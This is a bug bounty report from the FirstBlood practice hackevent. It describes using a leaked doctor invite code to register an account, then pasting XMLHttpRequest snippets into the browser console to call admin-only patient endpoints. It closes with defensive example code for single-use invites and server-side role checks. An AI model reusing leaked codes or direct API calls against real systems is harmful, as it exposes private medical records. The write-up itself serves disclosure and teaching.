FirstBlood #167: Creating an admin account using a leaked token on r/BugBountyHunter and using restricted API calls.



On 2021-05-11, th4nu0x0 reported:

Summary:

  • On r/BugBountyHunter someone has leaked their doctor registration unique invite code. Using this invite code I was able to create an admin account on firstbloodhackers.com.

  • After logging into the account there was a warning and all API calls were restricted on the admin dashboard.

  • Even though the API calls are restricted and we are unable to view users' information in the UI, they are only restricted in the UI: we can use our cookies to make those calls and retrieve the patients' information.

  URL of the post: https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/

  Invite code: F16CA47250E445888824A9E63AE445CE

Steps To Reproduce:

  1. Visit the registration form, enter a username and, for the invite code, enter F16CA47250E445888824A9E63AE445CE
  2. After this you'll be given a password. Copy it and log in.
  3. On the dashboard you'll notice that you are not allowed to view users'/patients' information.

  4. Paste this code into your browser console:

    • To get information of an application (Patient) :

      var xhr = new XMLHttpRequest();
      xhr.open("GET", 'drapi/query.php?aptid={application-id}', true); // replace with application id

      xhr.onreadystatechange = function() {
          if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
              alert(this.responseText);
          }
      };
      xhr.send();

    • To search for a patient:

      var xhr = new XMLHttpRequest();
      xhr.open("POST", 'drapi/qp.php', true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

      xhr.onreadystatechange = function() {
          if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
              alert(this.responseText);
          }
      };
      xhr.send("name={name-here}"); // replace with name

Impact:

  • An attacker can use this invite code to create an account and retrieve all patients' information.

P2 High

This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Application/Business Logic


FirstBlood ID: 15
Vulnerability Type: Auth issues

A doctor's invite code is leaked on the internet which, if used, grants anyone access to the doctor portal. The invite code should expire after use.

FirstBlood ID: 11
Vulnerability Type: Application/Business Logic

Administrator endpoints can be accessed by non-privileged doctor accounts, which reveals sensitive patient information.
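As an added example covering both findings above (it is not FirstBlood's own code), the following in-memory model shows the two server-side controls they call for: an invite code that is consumed on first use, and a per-endpoint role check that is enforced on the server regardless of what the dashboard hides. The endpoint paths drapi/query.php and drapi/qp.php come from the report; the session shape, role names, invite-store layout and patient records are assumptions constructed for the example.

```javascript
"use strict";

// Constructed sample data: each invite code is single-use and bound to a role.
// (Assumed store layout; not FirstBlood's schema.)
const inviteCodes = new Map([
  ["INVITE-CODE-PLACEHOLDER-0001", { role: "doctor", usedBy: null }],
]);

// Constructed sample patient applications keyed by application id.
const applications = new Map([
  ["1001", { aptid: "1001", name: "Sample Patient", notes: "constructed record" }],
]);

// Redeem an invite code exactly once. Once consumed, a later leak of the same
// code (the situation in the report) no longer yields an account.
function redeemInviteCode(code, username) {
  const entry = inviteCodes.get(code);
  if (!entry) return { ok: false, error: "unknown invite code" };
  if (entry.usedBy !== null) return { ok: false, error: "invite code already used" };
  entry.usedBy = username;
  return { ok: true, session: { user: username, role: entry.role } };
}

// Roles allowed per endpoint. The decision lives on the server, so a request
// sent from the browser console with a valid cookie gets the same answer as
// the dashboard UI.
const endpointRoles = {
  "/drapi/query.php": ["admin"],
  "/drapi/qp.php": ["admin"],
};

function authorize(session, path) {
  if (!session || typeof session.role !== "string") return false;
  const allowed = endpointRoles[path];
  return Array.isArray(allowed) && allowed.includes(session.role);
}

// Server-side handler for the application lookup (drapi/query.php?aptid=...).
// Returns an HTTP-like result so the authorization check, not the UI, decides
// what is disclosed.
function handleQuery(session, aptid) {
  if (!authorize(session, "/drapi/query.php")) {
    return { status: 403, body: { error: "forbidden" } };
  }
  const record = applications.get(String(aptid));
  if (!record) return { status: 404, body: { error: "not found" } };
  return { status: 200, body: record };
}

// Server-side handler for the patient search (POST drapi/qp.php, name=...).
function handleSearch(session, name) {
  if (!authorize(session, "/drapi/qp.php")) {
    return { status: 403, body: { error: "forbidden" } };
  }
  const needle = String(name).toLowerCase();
  const hits = [...applications.values()].filter(
    (r) => r.name.toLowerCase().includes(needle)
  );
  return { status: 200, body: hits };
}

// Stand-alone walkthrough: the first redemption succeeds, the second fails,
// and the resulting doctor session is refused at both admin endpoints.
const first = redeemInviteCode("INVITE-CODE-PLACEHOLDER-0001", "dr_one");
const second = redeemInviteCode("INVITE-CODE-PLACEHOLDER-0001", "someone_else");
console.log(first.ok, second.ok);                              // true false
console.log(handleQuery(first.session, "1001").status);        // 403
console.log(handleQuery({ user: "ops", role: "admin" }, "1001").status); // 200
```

The point of the two checks is that the UI warning in the report was never a control: the drapi endpoints answered any request that carried a valid session cookie. With the role map applied inside the handlers, a doctor-role session receives 403 whether the request comes from the dashboard or from a hand-crafted XMLHttpRequest, and the consumed invite code cannot be reused to mint further accounts.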


Respect Earnt: 2500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.